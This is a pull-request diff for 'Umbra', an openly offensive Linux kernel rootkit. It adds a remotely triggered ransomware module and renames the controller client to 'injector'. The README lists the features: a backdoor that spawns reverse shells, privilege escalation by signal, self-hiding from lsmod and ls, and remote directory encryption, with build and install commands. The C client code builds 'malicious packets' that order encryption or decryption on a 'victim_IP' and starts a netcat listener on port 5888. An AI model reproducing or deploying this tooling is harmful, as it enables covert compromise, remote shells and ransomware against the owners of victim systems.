Merge pull request #4 from h3xduck/ransomware

Umbra Modules update

Author: h3xduck

.gitignore

@@ -1,8 +1,9 @@
-.vscode
 client/client.o
 kernel/*.*
 kernel/src/*.*
 !kernel/src/*.c
 !kernel/*.c
+modules/*.o
+modules/ransom
 
 

.vscode/settings.json

@@ -1,6 +1,7 @@
 {
     "files.associations": {
         "init.h": "c",
-        "module.h": "c"
+        "module.h": "c",
+        "cstdlib": "c"
     }
 }

README.md

@@ -5,27 +5,33 @@
 
 # Umbra <img src="images/umbraicon2.png" float="right" width = 50>
 
-Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to remote hosts and more.
+Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more. 
 
 The rootkit is still under development, although the features listed below are already fully operational.
 
-![Backdoor in action](https://github.com/h3xduck/Umbra/blob/master/images/umbra3.gif)
+![Backdoor in action](https://github.com/h3xduck/Umbra/blob/master/images/umbra4.0_1.gif)
 
 Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.
 
 ## Features
 * :star2: Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.
-* Privilege escalation by sending signal 50.
-* Spawn netcat reverse shell on module load.
-* Spawn netcat reverse shell to a remote host by sending signal 51.
-* **NEW**: Added the *Umbra Injector* to control the rootkit remotely:
+* :star2: Use the *Umbra Injector* to control the rootkit remotely:
   * Remote reverse shell.
   * Hide/unhide rootkit remotely.
+  * Launch *Umbra Modules*.
 
-<img src="images/umbrainjector.png" width = 800/>
+<img src="images/umbrainjectorwithmodules.png" width = 800/>
+
+* **NEW:** Added the ***Umbra Modules***, special malware-like modules which enhance Umbra and can be launched remotely by the Umbra Injector.
+* **NEW:** Umbra module "***Ransom***" which turns Umbra into a remotely controllable ransomware.
+
+![Ransom module in action](https://github.com/h3xduck/Umbra/blob/master/images/umbra4.0_2.gif)
 
-* **NEW**: Umbra hides all its files and directories from user commands such as *ls*.
-* **NEW**: Umbra can hide/unhide itself remotely and locally via signals.
+* Umbra hides all its files and directories from user commands such as *ls*.
+* Umbra can hide/unhide itself remotely and locally via signals.
+* Privilege escalation by sending signal 50.
+* Spawn netcat reverse shell on module load.
+* Spawn netcat reverse shell to a remote host by sending signal 51.
 
 More functionalities will come in later updates.
 
@@ -36,20 +42,24 @@ Also bear in mind that Umbra only incorporates light hiding and protection mecha
 
 **IMPORTANT:** If you are going to test this rootkit in your own machine, I *strongly recommend* to use a VM. 
 
+**About the Umbra Modules:** The *ransom* module uses a trivial encryption mechanism but it can and will certainly encrypt any folder in your machine. Although files can be easily decrypted, I *definitely do not recommend* running this towards your root folder or similar unless on a controlled environment.
+
 ## Table of Contents
 1. [Build and Install](#build-and-install)
 2. [Unloading Umbra](#unloading-umbra)
 3. [Local Control](#basic-usage-local-control)
 4. [Remote Control](#umbra-injector-remote-control)
-5. [References](#references)
+5. [Umbra Modules](#umbra-modules)
+   * [(NEW) Ransom](#ransom-module)
+6. [References](#references)
 
 ## Build and install
 Remember that you should have a 4.x or 5.x kernel available.
 1. Download your kernel header files
 ```sh
 apt install linux-headers-$(uname -r)
 ```
-2.Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check ```.vscode/c_cpp_properties.json``` for an example on which directories to include.
+2. Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check ```.vscode/c_cpp_properties.json``` for an example on which directories to include.
 
 3. Clone the project
 ```
@@ -60,12 +70,22 @@ cd Umbra
 ```
 make
 ```
-5. Load Umbra in the kernel
+5. Load Umbra in the kernel and configure environment
+The script will install Umbra in the kernel and configure a special directory where to store the malware modules. The directory will be later hidden by the rootkit.
+
+```
+sudo ./install.sh
+```
+
+If you have previously run the script and wish to just install Umbra in the kernel, you can run:
+
 ```
 sudo insmod ./umbra.ko
 ```
 
 ## Unloading Umbra
+Make sure Umbra is not in invisible mode, otherwise this will fail.
+
 ```
 sudo rmmod umbra
 ```
@@ -108,23 +128,23 @@ kill -52 1
 ### Unhide the rootkit
 This reverts the invisible mode if active.
 ```
-./client -53 127.0.0.1
+kill -53 1
 ```
 
 ## Umbra Injector: Remote control
-### **NEW**: Get reverse shell
+### Get reverse shell
 The program can be run either before Umbra is installed (thus waiting until it is), or after Umbra is installed on the target system.
 ```
-./client -S 127.0.0.1
+./injector -S 127.0.0.1
 ```
 
-### **NEW**: Hide the rootkit remotely - Invisible mode
+### Hide the rootkit remotely - Invisible mode
 This will prevent the rootkit from being shown by commands such as *lsmod*, or being removed via *rmmod*.
 ```
-./client -i 127.0.0.1
+./injector -i 127.0.0.1
 ```
 
-### **NEW**: Unhide the rootkit remotely
+### ¡Unhide the rootkit remotely
 This reverts the invisible mode if active.
 ```
 ./client -u 127.0.0.1
@@ -133,10 +153,23 @@ This reverts the invisible mode if active.
 ### Help
 You can see the full information on how to run the client by:
 ```
-./client -h
+./injector -h
 ```
 
+## Umbra Modules
+### Ransom module
+This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the *.ubr* extension.
 
+Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.
+#### Encrypt a directory and all its sub-directories
+```
+./injector -p /Your/Path/To/Encrypt -e 127.0.0.1
+```
+
+#### Decrypt a directory and all its sub-directories
+```
+./injector -p /Your/Path/To/Decrypt -d 127.0.0.1
+```
 
 ## References
 The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used:

client/Makefile

@@ -3,14 +3,14 @@ HEADERS = lib/RawTCP.h
 EXTRA_CFLAGS= -I$(PWD)/lib
 
 default:
-	make client
+	make injector
 
 client.o: client.c $(HEADERS)
 	gcc -c client.c
 
-client: client.o lib/libRawTCP_Lib.a
-	gcc -lm -o client client.o -L. lib/libRawTCP_Lib.a
+injector: client.o lib/libRawTCP_Lib.a
+	gcc -lm -o injector client.o -L. lib/libRawTCP_Lib.a
 
 clean:
 	-rm -f client.o
-	-rm -f client
+	-rm -f injector

client/client

@@ -26,22 +26,28 @@ void print_welcome_message(){
 }
 
 void print_help_dialog(const char* arg){
-    printf("\nUsage: %s [OPTION] victim_IP\n\n", arg);
+    printf("\nUsage: %s OPTION victim_IP\n\n", arg);
     printf("Program OPTIONs\n");
-    char* line = "-S victim_IP";
+    char* line = "-S";
     char* desc = "Get a remote shell to victim_IP";
-    printf("\t%-50s %-50s\n\n", line, desc);
-    line = "-u victim_IP";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-p [PATH] -e";
+    desc = "*Ransom module* Recursively encrypt directory PATH on victim_IP";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-p [PATH] -d";
+    desc = "*Ransom module* Recursively decrypt directory PATH on victim_IP";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-u";
     desc = "Unhide the rootkit remotely from the host";
-    printf("\t%-50s %-50s\n\n", line, desc);
-    line = "-i victim_IP";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-i";
     desc = "Hide the rootkit remotely from the host";
-    printf("\t%-50s %-50s\n\n", line, desc);
-    line = "\nProgram options";
-    printf("\t%-50s\n", line);
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "\nOther options";
+    printf("\t%-40s\n", line);
     line = "-h";
     desc = "Print this help";
-    printf("\t%-50s %-50s\n\n", line, desc);
+    printf("\t%-40s %-50s\n\n", line, desc);
 
 }
 
@@ -107,7 +113,7 @@ void get_shell(char* argv){
     }else {
         //Activating listener
         char *cmd = "nc";
-        char *argv[3];
+        char *argv[4];
         argv[0] = "nc";
         argv[1] = "-lvp";
         argv[2] = "5888";
@@ -154,20 +160,66 @@ void hide_rootkit(char* argv){
     free(local_ip);
 }
 
+void encrypt_directory(char* argv, char* dir){
+    char* local_ip = getLocalIpAddress();
+    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
+    printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
+    char data_buffer[1024];
+    strcpy(data_buffer, "UMBRA_ENCRYPT_DIR");
+    strcat(data_buffer, dir);
+    check_ip_address_format(argv);
+    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
+    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
+    //Sending the malicious payload
+    if(rawsocket_send(packet)<0){
+        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
+    }else{
+        printf("["KGRN"OK"RESET"]""Request to encrypt directory successfully sent!\n");
+    }
+    free(local_ip);
+}
+
+void decrypt_directory(char* argv, char* dir){
+    char* local_ip = getLocalIpAddress();
+    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
+    printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
+    char data_buffer[1024];
+    strcpy(data_buffer, "UMBRA_DECRYPT_DIR");
+    strcat(data_buffer, dir);
+    check_ip_address_format(argv);
+    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
+    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
+    //Sending the malicious payload
+    if(rawsocket_send(packet)<0){
+        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
+    }else{
+        printf("["KGRN"OK"RESET"]""Request to decrypt directory successfully sent!\n");
+    }
+    free(local_ip);
+}
+
+
+
 
 void main(int argc, char* argv[]){
     if(argc<2){
         printf("["KRED"ERROR"RESET"]""Invalid number of arguments\n");
         print_help_dialog(argv[0]);
         return;
     }
-    
+
+    int ENCRYPT_MODE_SEL = 0;
+    int DECRYPT_MODE_SEL = 0;
+    int PATH_ARG_PROVIDED = 0;
+
+    int PARAM_MODULE_ACTIVATED = 0;
 
     int opt;
     char dest_address[32];
+    char path_arg[512];
 
     //Command line argument parsing
-    while ((opt = getopt(argc, argv, ":S:u:i:h")) != -1) {
+    while ((opt = getopt(argc, argv, ":S:u:i:p:e:d:h")) != -1) {
         switch (opt) {
         case 'S':
             print_welcome_message();
@@ -177,6 +229,7 @@ void main(int argc, char* argv[]){
             //printf("Option S has argument %s\n", optarg);
             strcpy(dest_address, optarg);
             get_shell(dest_address);
+            PARAM_MODULE_ACTIVATED = 1;
 
             break;
         case 'u': 
@@ -187,6 +240,7 @@ void main(int argc, char* argv[]){
             //printf("Option m has argument %s\n", optarg);
             strcpy(dest_address, optarg);
             show_rootkit(dest_address);
+            PARAM_MODULE_ACTIVATED = 1;
 
             break;
         case 'i': 
@@ -197,8 +251,23 @@ void main(int argc, char* argv[]){
             //printf("Option m has argument %s\n", optarg);
             strcpy(dest_address, optarg);
             hide_rootkit(dest_address);
+            PARAM_MODULE_ACTIVATED = 1;
+        
+        case 'e': 
+            ENCRYPT_MODE_SEL = 1;
+            strcpy(dest_address, optarg);
 
             break;
+        case 'd':
+            DECRYPT_MODE_SEL = 1;
+            strcpy(dest_address, optarg);
+            break;
+
+        case 'p':
+            PATH_ARG_PROVIDED = 1;
+            strcpy(path_arg, optarg);
+            break;
+
         case 'h':
             print_help_dialog(argv[0]);
             exit(0);
@@ -216,5 +285,24 @@ void main(int argc, char* argv[]){
             exit(EXIT_FAILURE);
         }
     }
+
+    //Checking activated mode, for those requiring multiple args
+    if(ENCRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
+        print_welcome_message();
+        sleep(1);
+        //Selecting encrypt directory - Ransomware ON mode
+        printf("["KBLU"INFO"RESET"]""Selected ENCRYPT a rootkit remotely\n");
+        encrypt_directory(dest_address, path_arg);
+    }else if(DECRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
+        print_welcome_message();
+        sleep(1);
+        //Selecting encrypt directory - Ransomware ON mode
+        printf("["KBLU"INFO"RESET"]""Selected DECRYPT a rootkit remotely\n");
+        decrypt_directory(dest_address, path_arg);
+    }else if(PARAM_MODULE_ACTIVATED==0){
+        printf("["KRED"ERROR"RESET"]""Invalid parameters\n");
+        print_help_dialog(argv[0]);
+        exit(EXIT_FAILURE);
+    }
 
 }